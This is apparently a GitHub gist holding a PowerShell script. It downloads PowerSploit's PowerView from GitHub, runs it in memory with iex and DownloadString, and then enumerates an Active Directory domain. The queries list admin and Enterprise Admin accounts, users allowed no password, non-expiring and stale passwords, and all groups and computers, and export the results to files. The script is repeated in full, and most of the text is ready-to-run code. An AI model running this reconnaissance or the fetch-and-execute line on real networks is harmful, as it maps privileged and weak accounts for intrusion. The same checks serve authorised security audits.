daniel0x00/PowerViewFirstChecks.ps1

## PowerViewFirstChecks.ps1
# Download and invoke PowerView:
iex(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

# All admin users of default domain:
$filename = 'admins_default_domain'; $out = Get-NetUser -AdminCount; Export-Clixml $filename'.out' -InputObject $out; "All admins in the domain. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort lastlogontimestamp | ft -wrap -autosize >> $filename'.txt'

# All enabled users (including admins) with no-password setting
$filename = 'users_no_password_default_domain'; $out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with no-password setting. Means this users could have weak passwords or even no password at all. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort pwdlastset | ft -wrap -autosize >> $filename'.txt'

# All enabled users (including admins) with password never expire setting
$filename = 'users_password_never_expire_default_domain'; $out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=65536)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with password never expire setting. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort pwdlastset | ft -wrap -autosize >> $filename'.txt'

# All enabled admins with password changed > 3 months
$filename = 'admins_enabled_with_old_password_default_domain'; $date_three_month = (Get-Date).AddMonths(-3).ToFileTime(); $out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(pwdlastset<=$date_three_month)(admincount=1))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled admins with password changed > 3 months. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort pwdlastset | ft -wrap -autosize >> $filename'.txt'

# All enabled users (including admins) with password changed > 6 months
$filename = 'users_enabled_with_old_password_default_domain'; $date_six_month = (Get-Date).AddMonths(-6).ToFileTime(); $out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(pwdlastset<=$date_six_month))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with password changed > 6 months. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort pwdlastset | ft -wrap -autosize >> $filename'.txt'

# All enabled users (including admins) who last logon is > 3 months.
$filename = 'users_enabled_with_old_logged_on_date_default_domain'; $date_three_month = (Get-Date).AddMonths(-3).ToFileTime(); $out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(lastlogontimestamp<=$date_three_month))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) who last logon is > 3 months. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort lastlogontimestamp | ft -wrap -autosize >> $filename'.txt'

# All enabled admins who last logon is > 3 months.
$filename = 'admins_enabled_with_old_logged_on_date_default_domain'; $date_three_month = (Get-Date).AddMonths(-3).ToFileTime(); $out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(lastlogontimestamp<=$date_three_month)(admincount=1))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled admins who last logon is > 3 months. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort lastlogontimestamp | ft -wrap -autosize >> $filename'.txt'

# All disabled users:
$filename = 'users_disabled_dafault_domain'; $out = Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"; Export-Clixml $filename'.out' -InputObject $out; "All disabled users. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort lastlogontimestamp | ft -wrap -autosize >> $filename'.txt'

# All enabled users:
$filename = 'users_enabled_dafault_domain'; $out = Get-NetUser -Filter "(!(userAccountControl:1.2.840.113556.1.4.803:=2))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort lastlogontimestamp | ft -wrap -autosize >> $filename'.txt'

# All enterprise admins
Get-NetGroupMember -GroupName "Enterprise Admins" -Recurse | Export-Clixml enterprise_admins_default_domain.out

# All users of default domain:
Get-NetUser | Export-Clixml users_default_domain.out

# Get all groups
Get-NetGroup -FullData | Export-Clixml groups_all_data_default_domain.out

# Get all computers
Get-NetComputer -FullData | Export-Clixml computers_all_data_default_domain.out
	# Download and invoke PowerView:
	iex(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

	# All admin users of default domain:
	$filename = 'admins_default_domain'; $out = Get-NetUser -AdminCount; Export-Clixml $filename'.out' -InputObject $out; "All admins in the domain. Count: $($out.count)" > $filename'.txt'; $out \| select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname \| sort lastlogontimestamp \| ft -wrap -autosize >> $filename'.txt'

	# All enabled users (including admins) with no-password setting
	$filename = 'users_no_password_default_domain'; $out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with no-password setting. Means this users could have weak passwords or even no password at all. Count: $($out.count)" > $filename'.txt'; $out \| select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname \| sort pwdlastset \| ft -wrap -autosize >> $filename'.txt'

	# All enabled users (including admins) with password never expire setting
	$filename = 'users_password_never_expire_default_domain'; $out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=65536)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with password never expire setting. Count: $($out.count)" > $filename'.txt'; $out \| select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname \| sort pwdlastset \| ft -wrap -autosize >> $filename'.txt'

	# All enabled admins with password changed > 3 months
	$filename = 'admins_enabled_with_old_password_default_domain'; $date_three_month = (Get-Date).AddMonths(-3).ToFileTime(); $out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(pwdlastset<=$date_three_month)(admincount=1))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled admins with password changed > 3 months. Count: $($out.count)" > $filename'.txt'; $out \| select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname \| sort pwdlastset \| ft -wrap -autosize >> $filename'.txt'

	# All enabled users (including admins) with password changed > 6 months
	$filename = 'users_enabled_with_old_password_default_domain'; $date_six_month = (Get-Date).AddMonths(-6).ToFileTime(); $out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(pwdlastset<=$date_six_month))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with password changed > 6 months. Count: $($out.count)" > $filename'.txt'; $out \| select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname \| sort pwdlastset \| ft -wrap -autosize >> $filename'.txt'

	# All enabled users (including admins) who last logon is > 3 months.
	$filename = 'users_enabled_with_old_logged_on_date_default_domain'; $date_three_month = (Get-Date).AddMonths(-3).ToFileTime(); $out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(lastlogontimestamp<=$date_three_month))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) who last logon is > 3 months. Count: $($out.count)" > $filename'.txt'; $out \| select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname \| sort lastlogontimestamp \| ft -wrap -autosize >> $filename'.txt'

	# All enabled admins who last logon is > 3 months.
	$filename = 'admins_enabled_with_old_logged_on_date_default_domain'; $date_three_month = (Get-Date).AddMonths(-3).ToFileTime(); $out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(lastlogontimestamp<=$date_three_month)(admincount=1))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled admins who last logon is > 3 months. Count: $($out.count)" > $filename'.txt'; $out \| select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname \| sort lastlogontimestamp \| ft -wrap -autosize >> $filename'.txt'

	# All disabled users:
	$filename = 'users_disabled_dafault_domain'; $out = Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"; Export-Clixml $filename'.out' -InputObject $out; "All disabled users. Count: $($out.count)" > $filename'.txt'; $out \| select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname \| sort lastlogontimestamp \| ft -wrap -autosize >> $filename'.txt'

	# All enabled users:
	$filename = 'users_enabled_dafault_domain'; $out = Get-NetUser -Filter "(!(userAccountControl:1.2.840.113556.1.4.803:=2))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users. Count: $($out.count)" > $filename'.txt'; $out \| select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname \| sort lastlogontimestamp \| ft -wrap -autosize >> $filename'.txt'

	# All enterprise admins
	Get-NetGroupMember -GroupName "Enterprise Admins" -Recurse \| Export-Clixml enterprise_admins_default_domain.out

	# All users of default domain:
	Get-NetUser \| Export-Clixml users_default_domain.out

	# Get all groups
	Get-NetGroup -FullData \| Export-Clixml groups_all_data_default_domain.out

	# Get all computers
	Get-NetComputer -FullData \| Export-Clixml computers_all_data_default_domain.out